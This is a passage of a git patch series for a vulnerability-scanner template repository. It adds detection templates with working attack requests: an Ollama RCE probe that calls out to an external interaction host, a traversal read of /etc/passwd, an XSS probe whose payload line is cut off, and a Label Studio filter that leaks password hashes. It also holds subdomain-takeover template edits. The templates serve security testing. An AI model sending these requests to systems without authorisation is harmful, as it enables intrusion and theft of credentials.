-http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:3313b39a211417f628e8e5920f936066fb87bf97 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:a7d63a6793e1c946f72b5dc3dda5b9837e99c65f +http/technologies/wordpress/plugins/wpforms-lite.yaml:103f644974060042064a470137a38f3f5a94d62c +http/technologies/wordpress/plugins/wps-hide-login.yaml:e385d537742f603f56fdf6d6d62e60f012dabb26 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:78c87e2887bff717fefc229841bb92bad7eedf97 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:1066f489d18cea148a075d3f6d2ad3398ed00356 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8842,7 +8843,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d2727ad00f9a73651cb8e53769376e8d9353bee0 +templates-checksum.txt:eb5a5b6a92afdce11333bc1526cb4a296b1d1e49 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 92263910e06c62dea6ee8471df275908325ab23e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 8 Jul 2024 07:17:44 +0000 Subject: [PATCH 0962/1841] Auto Generated New Template Addition List [Mon Jul 8 07:17:44 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index cbd689ac4a..b7c0425064 100644 --- a/.new-additions +++ b/.new-additions @@ -4,7 +4,9 @@ dast/vulnerabilities/injection/xinclude-injection.yaml http/cves/2020/CVE-2020-10189.yaml http/cves/2023/CVE-2023-3380.yaml http/cves/2023/CVE-2023-35156.yaml +http/cves/2023/CVE-2023-35159.yaml http/cves/2023/CVE-2023-35160.yaml +http/cves/2023/CVE-2023-35161.yaml http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-27292.yaml From f431bb06571de3e433d02dc0c1003bc509e2891b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Jul 2024 07:17:54 +0000 Subject: [PATCH 0963/1841] Auto Generated Templates Checksum [Mon Jul 8 07:17:54 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2857ec1703..964a69db71 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3186,6 +3186,7 @@ http/cves/2023/CVE-2023-35082.yaml:37ad71a404ca250f882e69f45503631e001653a2 http/cves/2023/CVE-2023-35156.yaml:72c2e061bd7264a8e88e39bed12978ba41608ad8 http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f http/cves/2023/CVE-2023-35160.yaml:18c32e9c618ae99d50b0d2772e2196b575e2ba36 +http/cves/2023/CVE-2023-35161.yaml:3d76e95e4d9eda1ca30d6f463c478b49d420282e http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 http/cves/2023/CVE-2023-35813.yaml:071b2cdd7e888724f69f9772dafccd2fd315b143 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 @@ -8843,7 +8844,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:eb5a5b6a92afdce11333bc1526cb4a296b1d1e49 +templates-checksum.txt:00b4a21e54c4cc54e7b74be2622e751d7c091f41 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cba833cdd254b4d3232801243de9ccee0d11bbab Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 8 Jul 2024 07:18:35 +0000 Subject: [PATCH 0965/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 789039616e..3244be4d20 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,7 +9,9 @@ on: - 'http/cves/2020/CVE-2020-10189.yaml' - 'http/cves/2023/CVE-2023-3380.yaml' - 'http/cves/2023/CVE-2023-35156.yaml' + - 'http/cves/2023/CVE-2023-35159.yaml' - 'http/cves/2023/CVE-2023-35160.yaml' + - 'http/cves/2023/CVE-2023-35161.yaml' - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-27292.yaml' From e652c0c27c814416355da11cc0e1ed6b352e51bd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Jul 2024 07:18:37 +0000 Subject: [PATCH 0966/1841] Auto Template Signing [Mon Jul 8 07:18:37 UTC 2024] :robot: --- http/cves/2024/CVE-2024-36991.yaml | 1 + http/misconfiguration/springboot/springboot-configprops.yaml | 3 +-- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-36991.yaml b/http/cves/2024/CVE-2024-36991.yaml index 2619d3af96..c5f957eb7a 100644 --- a/http/cves/2024/CVE-2024-36991.yaml +++ b/http/cves/2024/CVE-2024-36991.yaml @@ -46,3 +46,4 @@ http: - "fonts" - "extensions" condition: and +# digest: 490a004630440220161560c30250454c6c092372dd49e93373fc293e9182a899cfcd282f27d1620902207118a8878843fe627bcaa1cd661acf7251c99a57a1a3ce6b5efcb71c88852d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/springboot/springboot-configprops.yaml b/http/misconfiguration/springboot/springboot-configprops.yaml index f7e24a0ed2..55555c8778 100644 --- a/http/misconfiguration/springboot/springboot-configprops.yaml +++ b/http/misconfiguration/springboot/springboot-configprops.yaml @@ -38,5 +38,4 @@ http: - "application/vnd.spring-boot.actuator.v1+json" condition: or part: header - -# digest: 4b0a00483046022100de778671099362e7bbae4ff422611ac686cee397df849b5a0c387a101eefe9da0221009c18715f4ab99ccbebcba20781c366e03b634a4c9364a72d44c1b98fa3ba45b4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210097a39ca6ef994a3f46a6b8bf2886df951659e8020c10d8cf820da33acd4581ba022078fdb6bc8f3ab878aaa7b43e0b084cad9eeef4f344cca83290d131a2d3022df6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 44e44ec09107a0c95dbbdc82809fbd78c4ba0a6a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Jul 2024 13:09:01 +0530 Subject: [PATCH 0967/1841] Create CVE-2024-37032.yaml --- http/cves/2024/CVE-2024-37032.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2024/CVE-2024-37032.yaml diff --git a/http/cves/2024/CVE-2024-37032.yaml b/http/cves/2024/CVE-2024-37032.yaml new file mode 100644 index 0000000000..62e5675801 --- /dev/null +++ b/http/cves/2024/CVE-2024-37032.yaml @@ -0,0 +1,40 @@ +id: CVE-2024-37032 + +info: + name: Ollama - Remote Code Execution + author: kaks3c + severity: critical + description: | + Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring. + reference: + - https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032 + - https://nvd.nist.gov/vuln/detail/CVE-2024-37032 + - https://github.com/Bi0x/CVE-2024-37032 + metadata: + verified: true + max-request: 1 + shodan-query: ollama + tags: cve,cve2024,ollama,rce + +http: + - raw: + - | + POST /api/pull HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "http://{{interactsh-url}}/rogue/{{randstr}}", "insecure": true} + + - | + POST /api/push HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "http://{{interactsh-url}}/rogue/{{randstr}}", "insecure": true} + + matchers: + - type: dsl + dsl: + - contains(interactsh_protocol, 'http') + - contains_all(header, 'application/x-ndjson') && contains(body_2, 'retrieving manifest') + condition: and From 19de67434aa7e412cd4a4d5fe2731dba50fadaa7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Jul 2024 13:21:38 +0530 Subject: [PATCH 0968/1841] Create CNVD-2021-64035.yaml --- http/cnvd/2024/CNVD-2021-64035.yaml | 38 +++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/cnvd/2024/CNVD-2021-64035.yaml diff --git a/http/cnvd/2024/CNVD-2021-64035.yaml b/http/cnvd/2024/CNVD-2021-64035.yaml new file mode 100644 index 0000000000..2f97ea6bd3 --- /dev/null +++ b/http/cnvd/2024/CNVD-2021-64035.yaml @@ -0,0 +1,38 @@ +id: CNVD-2021-64035 + +info: + name: Leadsec VPN - Arbitrary File Read + author: xiaoWangSec + severity: high + description: | + There is an information leakage vulnerability in the SSL VPN of Beijing Wangyuxingyun Information Technology Co., Ltd., and attackers can use the vulnerability to obtain sensitive information. + reference: + - https://avd.aliyun.com/detail?id=AVD-2021-888761 + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-64035 + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="-15980305" + tags: cnvd,cnvd2024,lfi,leadsec,vpn + +http: + - raw: + - | + GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "appframe" + + - type: status + status: + - 200 From c24dfb8a1079eb835202a33214c416be0988b2ab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 8 Jul 2024 16:30:51 +0530 Subject: [PATCH 0969/1841] Create CVE-2023-44012.yaml --- http/cves/2023/CVE-2023-44012.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-44012.yaml diff --git a/http/cves/2023/CVE-2023-44012.yaml b/http/cves/2023/CVE-2023-44012.yaml new file mode 100644 index 0000000000..a6b01f80b1 --- /dev/null +++ b/http/cves/2023/CVE-2023-44012.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-44012 + +info: + name: mojoPortal v.2.7.0.0 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component. + impact: | + Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser. + remediation: | + Upgrade to a patched version of mojoPortal to mitigate the Cross Site Scripting (XSS) vulnerability. + reference: + - https://github.com/Vietsunshine-Electronic-Solution-JSC/Vulnerability-Disclosures/tree/main/2023/CVE-2023-44012 + - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2023-44012 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-44012 + cwe-id: CWE-79 + epss-score: 0.0009 + epss-percentile: 0.37745 + cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: mojoportal + product: mojoportal + fofa-query: title="mojoPortal" + tags: cve,cve2023,mojoportal,xss + +http: + - method: GET + path: + - "{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'> Date: Mon, 8 Jul 2024 17:19:10 +0530 Subject: [PATCH 0970/1841] Create CVE-2023-47117.yaml --- http/cves/2023/CVE-2023-47117.yaml | 69 ++++++++++++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 http/cves/2023/CVE-2023-47117.yaml diff --git a/http/cves/2023/CVE-2023-47117.yaml b/http/cves/2023/CVE-2023-47117.yaml new file mode 100644 index 0000000000..3a3359700d --- /dev/null +++ b/http/cves/2023/CVE-2023-47117.yaml @@ -0,0 +1,69 @@ +id: CVE-2023-47117 + +info: + name: Label Studio - Sensitive Information Exposure + author: pdresearch + severity: high + description: | + An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. + reference: + - https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277 + - https://nvd.nist.gov/vuln/detail/CVE-2023-47117 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-47117 + cwe-id: CWE-200 + cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:* + metadata: + max-request: 4 + verified: true + shodan-query: title:"Label Studio" + vendor: humansignal + product: label_studio + tags: cve,cve2023,label_studio,oss,exposure,authenticated + +variables: + Task_id: "{{task}}" + Project_id: "{{project}}" + +http: + - raw: + - | + GET /user/login/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /user/login/?next=/projects/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on + + - | + PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"} + + - | + GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body_4, "completed_at", "file_upload", "annotators")' + - 'status_code_3==200 && status_code_4==200' + - 'contains(header_4, "application/json")' + condition: and + + extractors: + - type: regex + part: body + name: csrf + group: 1 + regex: + - 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">' + internal: true From d9fc7b1485c5df621cdc50f9a7d23e593235cd4e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Jul 2024 17:33:16 +0530 Subject: [PATCH 0971/1841] Create label-studio-signup.yaml --- .../misconfiguration/label-studio-signup.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/misconfiguration/label-studio-signup.yaml diff --git a/http/misconfiguration/label-studio-signup.yaml b/http/misconfiguration/label-studio-signup.yaml new file mode 100644 index 0000000000..66392212ab --- /dev/null +++ b/http/misconfiguration/label-studio-signup.yaml @@ -0,0 +1,33 @@ +id: label-studio-signup + +info: + name: Label Studio - Sign-up Detect + author: DhiyaneshDK + severity: unknown + description: | + Detects the presence of the Label Studio sign-up. + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1649949475 + tags: label-studio,sign-up,misconfig + +http: + - raw: + - | + GET /user/signup HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + matchers-condition: and + matchers: + - type: word + words: + - "Label Studio" + - "Sign up" + - "Create Account" + part: body + + - type: status + status: + - 200 From 6ee1ae005dea6f57a43db63b5b4c7afe5f5eea66 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Jul 2024 17:35:42 +0530 Subject: [PATCH 0972/1841] Create label-studio-panel.yaml --- http/exposed-panels/label-studio-panel.yaml | 31 +++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/exposed-panels/label-studio-panel.yaml diff --git a/http/exposed-panels/label-studio-panel.yaml b/http/exposed-panels/label-studio-panel.yaml new file mode 100644 index 0000000000..7783f70fda --- /dev/null +++ b/http/exposed-panels/label-studio-panel.yaml @@ -0,0 +1,31 @@ +id: label-studio-panel + +info: + name: Label Studio - Login Panel + author: DhiyaneshDK + severity: info + description: | + Detects the presence of the Label Studio Login Page. + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1649949475 + tags: label-studio,login,panel + +http: + - raw: + - | + GET /user/login HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "Label Studio" + - "Log in" + part: body + + - type: status + status: + - 200 From fdce14ced38467e1a806675663341669a90fcffa Mon Sep 17 00:00:00 2001 From: Naman <45028933+BitThr3at@users.noreply.github.com> Date: Mon, 8 Jul 2024 17:46:52 +0530 Subject: [PATCH 0973/1841] Update http takeover templates to show misconfigured cname --- http/takeovers/aftership-takeover.yaml | 4 ++++ http/takeovers/agilecrm-takeover.yaml | 4 ++++ http/takeovers/aha-takeover.yaml | 4 ++++ http/takeovers/airee-takeover.yaml | 5 +++++ http/takeovers/anima-takeover.yaml | 5 +++++ http/takeovers/announcekit-takeover.yaml | 5 +++++ http/takeovers/bigcartel-takeover.yaml | 5 +++++ http/takeovers/bitbucket-takeover.yaml | 5 +++++ http/takeovers/campaignmonitor-takeover.yaml | 5 +++++ http/takeovers/canny-takeover.yaml | 5 +++++ http/takeovers/cargo-takeover.yaml | 5 +++++ http/takeovers/cargocollective-takeover.yaml | 5 +++++ http/takeovers/clever-takeover.yaml | 4 ++++ http/takeovers/flexbe-takeover.yaml | 5 +++++ http/takeovers/frontify-takeover.yaml | 5 +++++ http/takeovers/gemfury-takeover.yaml | 5 +++++ http/takeovers/getresponse-takeover.yaml | 5 +++++ http/takeovers/ghost-takeover.yaml | 5 +++++ http/takeovers/gitbook-takeover.yaml | 5 +++++ http/takeovers/github-takeover.yaml | 5 +++++ http/takeovers/gohire-takeover.yaml | 5 +++++ http/takeovers/hatenablog-takeover.yaml | 5 +++++ http/takeovers/helpdocs-takeover.yaml | 5 +++++ http/takeovers/helpjuice-takeover.yaml | 5 +++++ http/takeovers/helprace-takeover.yaml | 5 +++++ http/takeovers/helpscout-takeover.yaml | 5 +++++ http/takeovers/hubspot-takeover.yaml | 5 +++++ http/takeovers/intercom-takeover.yaml | 5 +++++ http/takeovers/jazzhr-takeover.yaml | 5 +++++ http/takeovers/jetbrains-takeover.yaml | 5 +++++ http/takeovers/kinsta-takeover.yaml | 5 +++++ http/takeovers/launchrock-takeover.yaml | 5 +++++ http/takeovers/leadpages-takeover.yaml | 5 +++++ http/takeovers/lemlist-takeover.yaml | 5 +++++ http/takeovers/mashery-takeover.yaml | 5 +++++ http/takeovers/meteor-takeover.yaml | 5 +++++ http/takeovers/netlify-takeover.yaml | 5 +++++ http/takeovers/ngrok-takeover.yaml | 5 +++++ http/takeovers/pagewiz-takeover.yaml | 5 +++++ http/takeovers/pantheon-takeover.yaml | 5 +++++ http/takeovers/pingdom-takeover.yaml | 5 +++++ http/takeovers/proposify-takeover.yaml | 5 +++++ http/takeovers/readme-takeover.yaml | 5 +++++ http/takeovers/readthedocs-takeover.yaml | 5 +++++ http/takeovers/shopify-takeover.yaml | 5 +++++ http/takeovers/short-io.yaml | 5 +++++ http/takeovers/simplebooklet-takeover.yaml | 5 +++++ http/takeovers/smartjob-takeover.yaml | 5 +++++ http/takeovers/smugmug-takeover.yaml | 5 +++++ http/takeovers/softr-takeover.yaml | 5 +++++ http/takeovers/sprintful-takeover.yaml | 5 +++++ http/takeovers/squadcast-takeover.yaml | 5 +++++ http/takeovers/strikingly-takeover.yaml | 5 +++++ http/takeovers/surge-takeover.yaml | 5 +++++ http/takeovers/surveygizmo-takeover.yaml | 5 +++++ http/takeovers/surveysparrow-takeover.yaml | 5 +++++ http/takeovers/tave-takeover.yaml | 5 +++++ http/takeovers/teamwork-takeover.yaml | 5 +++++ http/takeovers/tilda-takeover.yaml | 5 +++++ http/takeovers/tumblr-takeover.yaml | 5 +++++ http/takeovers/uberflip-takeover.yaml | 5 +++++ http/takeovers/uptime-takeover.yaml | 5 +++++ http/takeovers/uptimerobot-takeover.yaml | 5 +++++ http/takeovers/uservoice-takeover.yaml | 5 +++++ http/takeovers/vend-takeover.yaml | 5 +++++ http/takeovers/wishpond-takeover.yaml | 5 +++++ http/takeovers/wix-takeover.yaml | 4 ++++ http/takeovers/wordpress-takeover.yaml | 5 +++++ http/takeovers/worksites-takeover.yaml | 5 +++++ http/takeovers/wufoo-takeover.yaml | 5 +++++ http/takeovers/zendesk-takeover.yaml | 5 +++++ 71 files changed, 350 insertions(+) diff --git a/http/takeovers/aftership-takeover.yaml b/http/takeovers/aftership-takeover.yaml index 6c4455a146..1e34571993 100644 --- a/http/takeovers/aftership-takeover.yaml +++ b/http/takeovers/aftership-takeover.yaml @@ -25,5 +25,9 @@ http: - type: word words: - Oops.

The page you're looking for doesn't exist. + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" # digest: 490a004630440220222d1eb4e6f6121f15f5bc09566c05a04be84da680f71151b9a0217d13854d4b022066636a5d0f9d9541086bec1f1a65690fb36c5586c1735868842af4a0c58eaee5:922c64590222798bb761d5b6d8e72950 diff --git a/http/takeovers/agilecrm-takeover.yaml b/http/takeovers/agilecrm-takeover.yaml index 6d36137000..2a02619a20 100644 --- a/http/takeovers/agilecrm-takeover.yaml +++ b/http/takeovers/agilecrm-takeover.yaml @@ -25,5 +25,9 @@ http: - type: word words: - Sorry, this page is no longer available. + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" # digest: 4a0a00473045022100df8d7f10e37c0ea9ad8a43cad43285d174c0a517c03a1edd9acadc1c33996b3e022020a8458c4c9b14fcb69b1b580d4cd1df4b3978b8b02092699f8cced34099e500:922c64590222798bb761d5b6d8e72950 diff --git a/http/takeovers/aha-takeover.yaml b/http/takeovers/aha-takeover.yaml index 95bd2252d5..572a6dbf2d 100644 --- a/http/takeovers/aha-takeover.yaml +++ b/http/takeovers/aha-takeover.yaml @@ -25,5 +25,9 @@ http: - type: word words: - There is no portal here ... sending you back to Aha! + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" # digest: 4a0a0047304502202da63a10b501a98c072a6776384f2bb642c837e7641d4dd212870daca7f3d9c4022100cc8c4ca48ad64c1bf9fc3388866897a00f598074de0029df772a908fd56e7afa:922c64590222798bb761d5b6d8e72950 diff --git a/http/takeovers/airee-takeover.yaml b/http/takeovers/airee-takeover.yaml index 4c96c9344a..9e78ac357e 100644 --- a/http/takeovers/airee-takeover.yaml +++ b/http/takeovers/airee-takeover.yaml @@ -26,4 +26,9 @@ http: name: airee words: - 'Ошибка 402. Сервис Айри.рф не оплачен' + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 480a0045304302201fceaf9dc7e08c32388d3b25f15a78412295bf2d92087a506409f47b869448bd021f0b2d66db8da614dd8fafccc4e5bf7d5b7913386a434495fb55e2d1c0662a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/anima-takeover.yaml b/http/takeovers/anima-takeover.yaml index f820ee60ca..f86d22c26e 100644 --- a/http/takeovers/anima-takeover.yaml +++ b/http/takeovers/anima-takeover.yaml @@ -25,4 +25,9 @@ http: - type: word words: - "If this is your website and you've just created it, try refreshing in a minute" + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a00473045022100dc61f6f23fb5b89280618c559a5a94234bd675ee6529ce314614fdaef00723c202205ca59abbb43ac8b43633f12437e8e3871234c8df3a8be291a2890e95ada73b68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/announcekit-takeover.yaml b/http/takeovers/announcekit-takeover.yaml index a1f467385d..759e8f9245 100644 --- a/http/takeovers/announcekit-takeover.yaml +++ b/http/takeovers/announcekit-takeover.yaml @@ -30,4 +30,9 @@ http: - type: status status: - 404 + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a004730450220411ce0a310d41e6a13fec4c4e48258ef47b6f97caa6f60fe2dbedf33aac7b52b022100db40ab50a70f049a2baf180b003297fbe4e98aef554cd1c625616f1a7ae9a82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/bigcartel-takeover.yaml b/http/takeovers/bigcartel-takeover.yaml index 70e23f7ba1..dacbaa9c98 100644 --- a/http/takeovers/bigcartel-takeover.yaml +++ b/http/takeovers/bigcartel-takeover.yaml @@ -29,4 +29,9 @@ http: - type: dsl dsl: - '!contains(host,"bigcartel.com")' + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a00483046022100925b0be6cfcab185f932f0f073603f7240331485b0bc86ef326a6200d00be8f6022100fb1f27f39b22bb7b171bed7a45741877556f338a31086be1ad116d66d62f4670:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/bitbucket-takeover.yaml b/http/takeovers/bitbucket-takeover.yaml index 7f71cdc8e5..4ea261716e 100644 --- a/http/takeovers/bitbucket-takeover.yaml +++ b/http/takeovers/bitbucket-takeover.yaml @@ -31,4 +31,9 @@ http: words: - "text/plain" part: header + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4b0a00483046022100c094e34cf6d07e1c771f27f42193b0798c3a060af2d82d2d9bdd68976a43314c0221008e9f7aa2de005c4d1aaa61c13c0f932d5fad0e3293793f601cfed2bb8b49dba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/campaignmonitor-takeover.yaml b/http/takeovers/campaignmonitor-takeover.yaml index 370db8a3d9..6cad5229d7 100644 --- a/http/takeovers/campaignmonitor-takeover.yaml +++ b/http/takeovers/campaignmonitor-takeover.yaml @@ -27,4 +27,9 @@ http: - 'Trying to access your account?' - 'or ' - '404 Not Found
' condition: and + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a0047304502206e3e3a36081a8592520a2de1a112710b7bc015cccef9821507fc0064e33d7b780221008d1ad7b1bbc8e7687d2c8efe1be0fb64bf95a3402f36ba08bb4a2576ab6d7fff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/clever-takeover.yaml b/http/takeovers/clever-takeover.yaml index b41232ae6b..b063842f8a 100644 --- a/http/takeovers/clever-takeover.yaml +++ b/http/takeovers/clever-takeover.yaml @@ -28,5 +28,9 @@ http: - "The application you're trying to access doesn't seem to exist" - "support@clever-cloud.com" condition: and + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" # digest: 4a0a0047304502200a5e85c22f866e219ce404626a6c67addb67e89b5b92e10d9fd83b434e7336c3022100f862c3ca1bb2fb5467e28896d545cd1d2d17ef6fe6d9027fc95226caba6b5ca4:922c64590222798bb761d5b6d8e72950 diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index 114552775f..483c612016 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -32,4 +32,9 @@ http: - type: status status: - 404 + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 4a0a00473045022100f23c68360f3c8ffde41189aeb0c5571b3c4ad3e7c2e9b9c0afce192211737d2b022024647b913ab69f9aad45be5b47bc86466c29cce9c87a3f3d5315394e320d4d6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/frontify-takeover.yaml b/http/takeovers/frontify-takeover.yaml index da94fb03c2..4567d426d7 100644 --- a/http/takeovers/frontify-takeover.yaml +++ b/http/takeovers/frontify-takeover.yaml @@ -27,4 +27,9 @@ http: - 404 - Page Not Found - Oops… looks like you got lost condition: and + extractors: + - type: dsl + dsl: + - "resolve(Host, 'cname')" + # digest: 490a00463044022021b423105a656ced8ce8e422c0bddf2ed4b3f550ca7d7c9ac82743af2195e3f3022034a251441fb9da75665b9a0dce13a77c96aa2459116904b043670e79022a7ebd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 